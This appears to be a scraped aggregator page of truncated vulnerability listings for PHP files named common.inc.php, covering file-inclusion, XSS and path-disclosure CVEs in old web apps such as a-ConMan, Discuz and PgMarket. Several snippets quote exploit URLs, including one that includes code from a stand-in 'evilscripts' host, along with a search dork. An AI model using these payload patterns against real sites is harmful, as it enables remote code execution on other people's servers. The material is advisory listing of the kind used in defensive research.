Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5)

Exploit for unknown platform in category web applications =============================================================== Aterr 0.9.1 class Local File Inclusion Vulnerabilities php5 =============================================================== Atter 0.9.1 Local File Inclusion Vulnerability Auth...

Aterr 0.9.1 - PHP5 Local File Inclusion

Atter 0.9.1 Local File Inclusion Vulnerability Author : KnocKout ThanX : CW ALL USERS ================================================= Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5 Attackz : http://localsite.com/path/include/functions.inc.php?class=Local File...

Discuz! "$_SERVER['PHP_SELF']" XSS Vulnerability

在common.inc.php文件的69行： $PHPSELF = $SERVER'PHPSELF' ? $SERVER'PHPSELF' : $SERVER'SCRIPTNAME'; $SCRIPTFILENAME = strreplace'\\', '/', isset$SERVER'PATHTRANSLATED' ? $SERVER'PATHTRANSLATED' : $SERVER'SCRIPTFILENAME'; $boardurl = 'http://'.$SERVER'HTTPHOST'.pregreplace"//+api|archiver|wap?/$/i",...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in 1 PHPSELF in a serverstatus.php, and b grabglobals.lib.php, c displaychangepassword.lib.php, and d common.lib.php in...

CVE-2007-5589

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in 1 PHPSELF in a serverstatus.php, and b grabglobals.lib.php, c displaychangepassword.lib.php, and d common.lib.php in...

CVE-2007-5589

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in 1 PHPSELF in a serverstatus.php, and b grabglobals.lib.php, c displaychangepassword.lib.php, and d common.lib.php in...

CVE-2007-4290

Multiple PHP remote file inclusion vulnerabilities in Guestbook Script 1.9 allow remote attackers to execute arbitrary PHP code via a URL in the scriptroot parameter to 1 delete.php, 2 edit.php, or 3 inc/common.inc.php; or 4 database.php, 5 entries.php, 6 index.php, 7 logout.php, or 8 settings.ph...

Guestbook Script 1.9 RFI

Guestbook Script 1.9 Remote File Include Dork:"Guestbook Script 1.9" Vuln Code: /admin/database.php /admin/entries.php /admin/index.php /admin/logout.php /admin/settings.php /delete.php /edit.php /inc/common.inc.php Exploit: www.server.com/path/file.php?scriptroot=Sh3ll =====================...

Epistemon 1.0 - common.php?inc_path Remote File Inclusion

Epistemon 1.0 - common.php?incpath Remote File Inclusion -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Epistemon 1.0 = Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discover...

Discuz forum to blast the physical path principle-vulnerability warning-the black bar safety net

Affected version Discuz! 5.2 Discuz! 5.1 Discuz! 4.1 Discuz! 4.0 ............. 1. common. inc. php issues code 2 0, line 7 ..... $navtitle = $navigation = "; $extra = isset$extra && pregmatch"/^+$/i", $extra ? $extra : "; $tpp = intvalempty$DSESSION ? $topicperpage : $DSESSION; $ppp =...

Discuz论坛爆物理路径

当把变量当成数组提交时，如果不存在该数组，但存在变量，后面的pregmatch正则表达式匹配不了， 这样就出现了绝对路径的泄露 Discuz!5.2 Discuz!5.1 Discuz!4.1 Discuz!4.0 http://www.discuz.net/ 打开论坛 include 目录下的 common.inc.php $extra = isset$extra && pregmatch 改成 $extra = isset$extra && @pregmatch 1.common.inc.php问题代码207行 ..... $navtitle = $navigation = '';...

CVE-2006-6710

Multiple PHP remote file inclusion vulnerabilities in PgmReloaded 0.8.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 lang parameter to a index.php, the 2 CFGlibdir and 3 CFGlocaledir parameters to b common.inc.php, and the CFGlocalelangdir parameter to c...

A-Conman Common.Inc.PHP远程文件包含漏洞

A-Conman是一款基于php的WEB应用程序。 A-Conman不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Common.Inc.PHP'脚本对用户提交的'cmbasedir'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 a-ConMan a-ConMan 3.2b 目前没有解决方案提供： http://www.a-conman.com/...

CVE-2006-6078

CVE-2006-6078 : PHP remote file inclusion in the a-ConMan 3.2 beta package. The vulnerability is in common.inc.php, allowing remote attackers to execute arbitrary PHP code by supplying a URL in the cm_basedir parameter. Documented impact is arbitrary code execution via crafted input; exploitation...

CVE-2006-6078

PHP remote file inclusion vulnerability in common.inc.php in a-ConMan 3.2 beta allows remote attackers to execute arbitrary PHP code via a URL in the cmbasedir parameter...

a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability

No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV61$2006 ------------------------------------------------------------------------------ ECHOADV61$2006 a-ConMan = v3.2beta Remote File Inclusion...

a-ConMan 3.2b - common.inc.php Remote File Inclusion

a-ConMan 3.2b - common.inc.php Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV61$2006 ------------------------------------------------------------------------------ ECHOADV61$2006 a-ConMan = v3.2beta Remote File Inclusion...

CVE-2006-4448

Multiple PHP remote file inclusion vulnerabilities in interact 2.2, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the 1 CONFIGBASEPATH parameter in a admin/autoprompter.php and b includes/common.inc.php, and the 2 CONFIGLANGUAGECPATH parameter ...

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

C Y B E R - W A R R i O R T I M PgMarket 2.2.3 CFGlibdir Remote File Inclusion Vulnerabilities Author: xoron Class : Remote cont@ct: x0r0nathotmaildotcom Code: include $CFG"libdir" . "stdlib.inc.php"; Exploit: http://www.site.com/path/common.inc.php?CFGlibdir=http://evilscripts? Greetz: str0ke,...

CVE-2001-0088

The CVE-2001-0088 entry concerns phpWebLog 0.4.2 where the common.inc.php initialization fails to set the $CONF array correctly, causing the password to be reduced to a single character. This weakens the SiteKey and enables remote attackers to potentially gain administrative privileges. Documenta...